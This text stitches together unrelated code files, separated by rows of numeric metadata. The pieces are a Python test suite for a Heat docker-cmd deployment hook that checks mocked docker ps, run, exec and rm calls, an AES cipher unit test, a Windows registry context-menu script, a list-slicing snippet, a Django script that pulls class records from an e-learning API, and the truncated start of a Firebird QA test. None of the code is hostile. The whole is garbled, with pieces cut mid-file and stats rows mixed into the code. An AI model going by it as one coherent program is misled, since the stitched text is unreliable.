'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=web',
'managed_by=docker-cmd',
], state[6]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[7]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web',
'/bin/ls',
'-l'
], state[8]['args'])
def test_hook_exit_codes(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing
{},
# ps for renames
{},
# ps for currently running containers
{},
{'stdout': 'web'},
{
'stdout': '',
'stderr': 'Warning: custom exit code',
'returncode': 1
}
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data_exit_code))
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Warning: custom exit code',
'deploy_status_code': 0
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 5))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web',
'/bin/ls',
'-l'
], state[4]['args'])
def test_hook_failed(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing
{},
# ps for renames
{},
# ps for currently running containers
{},
# inspect for db unique container name
{},
# docker run db
{'stderr': 'Creating db...'},
# inspect for web unique container name
{},
# docker run web
{'stderr': 'Creating web...'},
# name lookup for exec web
{'stdout': 'web'},
# docker exec web fails
{
'stdout': '',
'stderr': 'No such file or directory',
'returncode': 2
}
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data))
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Creating db...\n'
'Creating web...\n'
'No such file or directory',
'deploy_status_code': 2
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 9))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'db'
], state[3]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'db',
'--detach=true',
'--env-file=env.file',
'--env=foo=bar',
'--privileged=false',
'xxx'
''
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=db',
'managed_by=docker-cmd',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'web',
], state[5]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'web',
'--detach=true',
'--env-file=foo.env',
'--env-file=bar.conf',
'--env=KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'--env=FOO=BAR',
'--net=host',
'--privileged=true',
'--restart=always',
'--user=root',
'--volume=/run:/run',
'--volume=db:/var/lib/db',
'yyy',
'/bin/webserver',
'start'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=web',
'managed_by=docker-cmd',
], state[6]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[7]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web',
'/bin/ls',
'-l'
], state[8]['args'])
def test_hook_unique_names(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing in this config id
{},
# ps for renames
{'stdout': 'web web\ndb db\n'},
# ps for currently running containers in this config id
{},
# inspect for db unique container name
{'stdout': 'exists'},
{
'stderr': 'Error: No such container: db-blah',
'returncode': 1
},
# docker run db
{'stderr': 'Creating db...'},
# # inspect for web unique container name
{'stdout': 'exists'},
{
'stderr': 'Error: No such container: web-blah',
'returncode': 1
},
# # docker run web
{'stderr': 'Creating web...'},
# name lookup for exec web
{'stdout': 'web-asdf1234'},
# docker exec web-asdf1234
{'stderr': 'one.txt\ntwo.txt\nthree.txt'},
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data))
self.assertEqual(0, returncode, stderr)
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Creating db...\n'
'Creating web...\n'
'one.txt\ntwo.txt\nthree.txt',
'deploy_status_code': 0
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 11))
db_container_name = state[4]['args'][4]
web_container_name = state[7]['args'][4]
self.assertRegex(db_container_name, 'db-[0-9a-z]{8}')
self.assertRegex(web_container_name, 'web-[0-9a-z]{8}')
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'db'
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
db_container_name,
], state[4]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
db_container_name,
'--detach=true',
'--env-file=env.file',
'--env=foo=bar',
'--privileged=false',
'xxx'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=db',
'managed_by=docker-cmd',
], state[5]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'web',
], state[6]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
web_container_name,
], state[7]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
web_container_name,
'--detach=true',
'--env-file=foo.env',
'--env-file=bar.conf',
'--env=KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'--env=FOO=BAR',
'--net=host',
'--privileged=true',
'--restart=always',
'--user=root',
'--volume=/run:/run',
'--volume=db:/var/lib/db',
'yyy',
'/bin/webserver',
'start'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=web',
'managed_by=docker-cmd',
], state[8]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[9]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web-asdf1234',
'/bin/ls',
'-l'
], state[10]['args'])
def test_cleanup_deleted(self):
self.env.update({
'TEST_RESPONSE': json.dumps([{
# first run, no running containers
'stdout': '\n'
}, {
# list name and container_name label for all containers
'stdout': '\n'
}])
})
conf_dir = self.useFixture(fixtures.TempDir()).join()
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([self.data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the first run, no docker rm calls made
state = list(self.json_from_files(self.test_state_path, 2))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list containers with config_id
'stdout': '111\n222\n333\n'
}, {
'stdout': '111 deleted'
}, {
'stdout': '222 deleted'
}, {
'stdout': '333 deleted'
}, {
# list name and container_name label for all containers
'stdout': '\n'
}])
})
# run again with empty config data
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the second run, abc123 is deleted,
# docker rm is run on all containers
state = list(self.json_from_files(self.test_state_path, 6))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-q',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'111',
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'222',
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'333',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[5]['args'])
def test_cleanup_changed(self):
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list name and container_name label for all containers
'stdout': '111 111\n'
'222 222\n'
'333\n'
}])
})
conf_dir = self.useFixture(fixtures.TempDir()).join()
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([self.data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the first run, no docker rm calls made
state = list(self.json_from_files(self.test_state_path, 2))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
# run again with changed config data
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list containers with config_id
'stdout': '111\n222\n333\n'
}, {
'stdout': '111 deleted'
}, {
'stdout': '222 deleted'
}, {
'stdout': '333 deleted'
}, {
# list name and container_name label for all containers
'stdout': 'abc123 abc123\n'
}])
})
new_data = copy.deepcopy(self.data)
new_data['config']['web']['image'] = 'yyy'
new_data['id'] = 'def456'
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([new_data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the second run, abc123 is deleted,
# docker rm is run on all containers
state = list(self.json_from_files(self.test_state_path, 6))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-q',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'111',
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'222',
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'333',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[5]['args'])
def test_cleanup_rename(self):
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list name and container_name label for all containers
'stdout': '111 111-s84nf83h\n'
'222 222\n'
'333 333-3nd83nfi\n'
}])
})
conf_dir = self.useFixture(fixtures.TempDir()).join()
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([self.data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the first run, no docker rm calls made
state = list(self.json_from_files(self.test_state_path, 4))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'rename',
'111',
'111-s84nf83h'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'rename',
'333',
'333-3nd83nfi'
], state[3]['args'])
| 30.843238
| 79
| 0.436136
| 2,766
| 30,103
| 4.581706
| 0.095445
| 0.035351
| 0.053026
| 0.070701
| 0.829243
| 0.806281
| 0.783556
| 0.778032
| 0.774087
| 0.760593
| 0
| 0.020041
| 0.418198
| 30,103
| 975
| 80
| 30.874872
| 0.703551
| 0.081653
| 0
| 0.850467
| 0
| 0
| 0.250672
| 0.075906
| 0
| 0
| 0
| 0
| 0.075935
| 1
| 0.010514
| false
| 0
| 0.007009
| 0
| 0.021028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
718cf820ac965b6af3f5a77248bd173d9249397b
| 3,159
|
py
|
Python
|
tests/src/gretel_client/unit/transformers/fpe/test_crypto_aes.py
|
franccesco/gretel-python-client
|
fd20dee07eba9657262edc902779142bf32c5b7c
|
[
"Apache-2.0"
] | null | null | null |
tests/src/gretel_client/unit/transformers/fpe/test_crypto_aes.py
|
franccesco/gretel-python-client
|
fd20dee07eba9657262edc902779142bf32c5b7c
|
[
"Apache-2.0"
] | null | null | null |
tests/src/gretel_client/unit/transformers/fpe/test_crypto_aes.py
|
franccesco/gretel-python-client
|
fd20dee07eba9657262edc902779142bf32c5b7c
|
[
"Apache-2.0"
] | null | null | null |
from gretel_client.transformers.fpe.crypto_aes import AESCipher, Mode
def test_crypto_aes():
test_object = memoryview(b"I am a not so fancy test object!")
test_object2 = memoryview(b"I am another fancirt tst object!")
# test_object = memoryview(b"I am a not so fa")
test_cipher = memoryview(bytearray(len(test_object)))
test_decipher = memoryview(bytearray(len(test_object)))
test_cipher2 = memoryview(bytearray(len(test_object)))
test_decipher2 = memoryview(bytearray(len(test_object)))
aes_cipher = AESCipher(
"12345678901234567890123456789012".encode(), mode=Mode.CBC_FAST
)
aes_cipher2 = AESCipher(
"12345678901234567890123456789012".encode(), mode=Mode.CBC_FAST
)
aes_cipher.encrypt_blocks(test_cipher, test_object)
aes_cipher.reset_cipher()
aes_cipher.encrypt_blocks(test_cipher2, test_object2)
aes_cipher.reset_cipher()
aes_cipher.decrypt_blocks(test_decipher2, test_cipher2)
aes_cipher.reset_cipher()
aes_cipher.decrypt_blocks(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher2.encrypt_blocks(test_cipher2, test_object)
aes_cipher2.decrypt_blocks(test_decipher2, test_cipher2)
assert test_decipher2.tobytes() == test_object.tobytes()
assert test_cipher2.tobytes() == test_cipher.tobytes()
aes_cipher.reset_cipher()
aes_cipher.encrypt(test_cipher, test_object)
aes_cipher.decrypt(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.ECB)
aes_cipher2 = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.ECB)
aes_cipher.encrypt_blocks(test_cipher, test_object)
aes_cipher.decrypt_blocks(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher2.encrypt_blocks(test_cipher2, test_object)
aes_cipher2.decrypt_blocks(test_decipher2, test_cipher2)
assert test_decipher2.tobytes() == test_object.tobytes()
assert test_cipher2.tobytes() == test_cipher.tobytes()
aes_cipher.encrypt(test_cipher, test_object)
aes_cipher.decrypt(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.CBC)
aes_cipher2 = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.CBC)
aes_cipher.encrypt_blocks(test_cipher, test_object)
aes_cipher.encrypt_blocks(test_cipher2, test_object2)
aes_cipher.decrypt_blocks(test_decipher2, test_cipher2)
aes_cipher.decrypt_blocks(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher2.encrypt_blocks(test_cipher2, test_object)
aes_cipher2.decrypt_blocks(test_decipher2, test_cipher2)
assert test_decipher2.tobytes() == test_object.tobytes()
assert test_cipher2.tobytes() == test_cipher.tobytes()
aes_cipher.encrypt(test_cipher, test_object)
aes_cipher.decrypt(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
| 50.142857
| 87
| 0.772713
| 394
| 3,159
| 5.847716
| 0.109137
| 0.108507
| 0.056424
| 0.09375
| 0.924479
| 0.91059
| 0.863715
| 0.823351
| 0.730469
| 0.694878
| 0
| 0.082366
| 0.127572
| 3,159
| 62
| 88
| 50.951613
| 0.753628
| 0.014245
| 0
| 0.714286
| 0
| 0
| 0.082262
| 0.061697
| 0
| 0
| 0
| 0
| 0.214286
| 1
| 0.017857
| false
| 0
| 0.017857
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71ddc02c1aed3d04ec80e3e8bfd2b8bd92f074d7
| 255
|
py
|
Python
|
tools/SLOC/register.py
|
tkgamegroup/flame
|
f1628100cc66e13f84ea3047ea33af019caeb01b
|
[
"MIT"
] | 25
|
2018-02-28T05:59:50.000Z
|
2022-03-18T03:11:52.000Z
|
tools/SLOC/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | null | null | null |
tools/SLOC/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | 5
|
2018-05-17T04:16:30.000Z
|
2021-12-22T04:02:02.000Z
|
import os
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\SLOC /VE /F /D SLOC")
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\SLOC\\Command /VE /F /D %s\\SLOC.exe" % (os.environ["FLAME_PATH"] + "\\bin\\debug"))
| 51
| 152
| 0.705882
| 42
| 255
| 4.190476
| 0.571429
| 0.090909
| 0.125
| 0.159091
| 0.647727
| 0.647727
| 0.647727
| 0.647727
| 0.647727
| 0.647727
| 0
| 0
| 0.082353
| 255
| 4
| 153
| 63.75
| 0.747863
| 0
| 0
| 0
| 0
| 0.333333
| 0.751969
| 0.452756
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
71df626f82a9fa821bd2af7c65f43f36d3310484
| 132
|
py
|
Python
|
59_slicing_the_lists.py
|
rahulbohra/Python-Basic
|
7dfadde341e9d02fdcb37f70cce10e8b689f36c9
|
[
"MIT"
] | null | null | null |
59_slicing_the_lists.py
|
rahulbohra/Python-Basic
|
7dfadde341e9d02fdcb37f70cce10e8b689f36c9
|
[
"MIT"
] | null | null | null |
59_slicing_the_lists.py
|
rahulbohra/Python-Basic
|
7dfadde341e9d02fdcb37f70cce10e8b689f36c9
|
[
"MIT"
] | null | null | null |
a = [1,2,3,4,5,6,7,8,9]
print a[1:3]
# [2,3]
print a[:5]
#[1,2,3,4,5]
print a[3:]
#[4,5,6,7,8,9]
print a[:]
#[1,2,3,4,5,6,7,8,9]
| 10.153846
| 23
| 0.454545
| 44
| 132
| 1.363636
| 0.25
| 0.133333
| 0.2
| 0.2
| 0.733333
| 0.65
| 0.65
| 0.65
| 0.65
| 0.65
| 0
| 0.309735
| 0.143939
| 132
| 12
| 24
| 11
| 0.221239
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.8
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e0b6afe617622c6804ebedbba6700cf1f2e451f0
| 5,472
|
py
|
Python
|
BCM_and_Week_Report_Data/fake_newclass.py
|
Kiritox0x/trp_assistant_bot
|
9776d3b6fc6ebccb5d6b8c0ea68c9b145dc4e06a
|
[
"MIT"
] | null | null | null |
BCM_and_Week_Report_Data/fake_newclass.py
|
Kiritox0x/trp_assistant_bot
|
9776d3b6fc6ebccb5d6b8c0ea68c9b145dc4e06a
|
[
"MIT"
] | null | null | null |
BCM_and_Week_Report_Data/fake_newclass.py
|
Kiritox0x/trp_assistant_bot
|
9776d3b6fc6ebccb5d6b8c0ea68c9b145dc4e06a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import requests
import json
import os
import sys
from datetime import *
import pytz
import django
sys.path.append("/home/khoaitaymocmam/Work/WebAPI/Topica/trm_assistant_bot/")
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "trp_assistant_bot.settings")
django.setup()
from mail_sender.models import *
def user_info(userId):
url = "http://elearning.hou2.topica.vn/api/apittm/api_user_info.php"
querystring = {"userId":userId}
headers = {
'cache-control': "no-cache",
}
print querystring
response = requests.request("GET", url, headers=headers, params=querystring)
response = json.loads(response.text)
return response["data"][0]
# Get list of activatingi classes
now = datetime.now(pytz.utc)
now = now.strftime('%m/%d/%Y')
def get_activating_class():
url = "http://elearning.hou2.topica.vn/api/apittm/api_post_bcm.php"
querystring = {"start_date": now,"end_date": now}
headers = {
'cache-control': "no-cache",
}
response = requests.request("GET", url, headers=headers, params=querystring)
response = json.loads(response.text)
return response["data"]
def get_account(string):
for i in range (len(string)):
if string[i] == "@":
return string[0:i]
def create_BCM(newclass_report):
if len(Bcm_room.objects.filter(subject_code = newclass_report["subject_code"])) == 0:
classroom = Bcm_room.objects.create()
# check if subject name exist
if newclass_report["subject_name"] != None:
classroom.subject_name = newclass_report["subject_name"]
else:
classroom.subject_name = "No subject name"
# check if teacher exist in open_course database, if not exist return null
if newclass_report["id_gvcm"] != None:
teacher = user_info(newclass_report["id_gvcm"])
teacher_email = teacher["email"]
teacher_account = get_account(teacher_email)
if len(Teacher.objects.filter(account = teacher_account)) != 0:
classroom.teacher = Teacher.objects.filter(account = teacher_account)[0]
# check if assistant exist in open_course database, if not exist return null
if newclass_report["id_gvhd"] != None:
assistant = user_info(newclass_report["id_gvhd"])
assistant_email = assistant["email"]
assistant_account = get_account(assistant_email)
if len(Assistant.objects.filter(account = assistant_account)) !=0:
classroom.assistant = Assistant.objects.filter(account = assistant_account)[0]
classroom.subject_code = newclass_report["subject_code"]
classroom.class_link = newclass_report["class_link"]
classroom.document_link = newclass_report["document_link"]
# set_time
classroom.start_date = datetime.strptime(newclass_report["start_course"], '%m-%d-%Y')
classroom.start_date = classroom.start_date.replace(tzinfo=pytz.utc)
classroom.finish_date = datetime.strptime(newclass_report["end_course"], '%m-%d-%Y')
classroom.finish_date = classroom.finish_date.replace(tzinfo=pytz.UTC)
classroom.examination_date = datetime.strptime(newclass_report["date_exam"] , '%m-%d-%Y')
classroom.examination_date = classroom.examination_date.replace(tzinfo = pytz.UTC)
if newclass_report["date_post_bcm"] != "NF":
classroom.date_post_BCM = datetime.strptime(newclass_report["date_post_bcm"], '%d-%m-%Y')
classroom.date_post_BCM = classroom.date_post_BCM.replace(tzinfo = pytz.UTC)
classroom.save()
else:
classroom = Bcm_room.objects.filter(subject_code = newclass_report["subject_code"])
classroom = classroom.get()
if newclass_report["subject_name"] != None:
classroom.subject_name = newclass_report["subject_name"]
else:
classroom.subject_name = "No subject name"
# check if teacher exist in open_course database, if not exist return null
if newclass_report["id_gvcm"] != None:
teacher = user_info(newclass_report["id_gvcm"])
teacher_email = teacher["email"]
teacher_account = get_account(teacher_email)
if len(Teacher.objects.filter(account = teacher_account)) != 0:
classroom.teacher = Teacher.objects.filter(account = teacher_account)[0]
# check if assistant exist in open_course database, if not exist return null
if newclass_report["id_gvhd"] != None:
assistant = user_info(newclass_report["id_gvhd"])
assistant_email = assistant["email"]
assistant_account = get_account(assistant_email)
if len(Assistant.objects.filter(account = assistant_account)) !=0:
classroom.assistant = Assistant.objects.filter(account = assistant_account)[0]
classroom.subject_code = newclass_report["subject_code"]
classroom.class_link = newclass_report["class_link"]
classroom.document = newclass_report["document_link"]
# set_time
classroom.start_date = datetime.strptime(newclass_report["start_course"], '%m-%d-%Y')
classroom.start_date = classroom.start_date.replace(tzinfo=pytz.utc)
classroom.finish_date = datetime.strptime(newclass_report["end_course"], '%m-%d-%Y')
classroom.finish_date = classroom.finish_date.replace(tzinfo=pytz.UTC)
classroom.examination_date = datetime.strptime(newclass_report["date_exam"] , '%m-%d-%Y')
classroom.examination_date = classroom.examination_date.replace(tzinfo = pytz.UTC)
if newclass_report["date_post_bcm"] != "NF":
classroom.date_post_BCM = datetime.strptime(newclass_report["date_post_bcm"], '%d-%m-%Y')
classroom.date_post_BCM = classroom.date_post_BCM.replace(tzinfo = pytz.UTC)
classroom.save()
database = get_activating_class()
for obj in database:
create_BCM(obj)
print "Get New Class Successfully"
| 39.366906
| 92
| 0.74799
| 730
| 5,472
| 5.382192
| 0.167123
| 0.110461
| 0.027997
| 0.061084
| 0.819801
| 0.806567
| 0.806567
| 0.804276
| 0.804276
| 0.783914
| 0
| 0.002713
| 0.124452
| 5,472
| 138
| 93
| 39.652174
| 0.817366
| 0.071455
| 0
| 0.625
| 0
| 0
| 0.151814
| 0.020899
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.076923
| null | null | 0.019231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0e9337d361352074861d1294373b19346792019
| 4,887
|
py
|
Python
|
tests/bugs/core_0908_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
tests/bugs/core_0908_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
tests/bugs/core_0908_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
#coding:utf-8
#
# id: bugs.core_0908
# title: Garbage in plan output of complex statement
# decription: This is unfortunate case. The fix for 2.1 went through several "adjustments" and we've get lost in changes. The result is that this was not properly fixed in 2.1 line (server doesn't crash, but don't returns the truncated plan as supposed either). Now when 2.1 line is at 2.1.3 we can hope for proper fix in 2.1.4. It should work as intended in 2.5 line.
# tracker_id: CORE-908
# min_versions: []
# versions: 3.0
# qmid: bugs.core_908
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
init_script_1 = """set term ^;
create procedure big_plan
returns (x integer)
as
begin
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
